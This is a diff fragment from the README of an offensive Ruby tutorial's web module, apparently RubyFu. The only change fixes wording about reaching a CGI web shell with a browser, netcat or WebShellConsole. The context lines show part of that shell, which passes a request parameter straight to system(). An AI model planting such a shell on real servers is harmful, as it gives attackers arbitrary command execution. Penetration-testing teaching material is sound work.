rubyfu/RubyFu/module_0x5__web_kungfu/README.md

 puts cgi.header
 system(cgi['cmd'])
 ```
-Now you can simple use browser, netcat or [^1]WebShellConsole to execute your commands.
+Now you can simply use browser, netcat or WebShellConsole[^1] to execute your commands.
 ex.
 **Brwoser**
 ```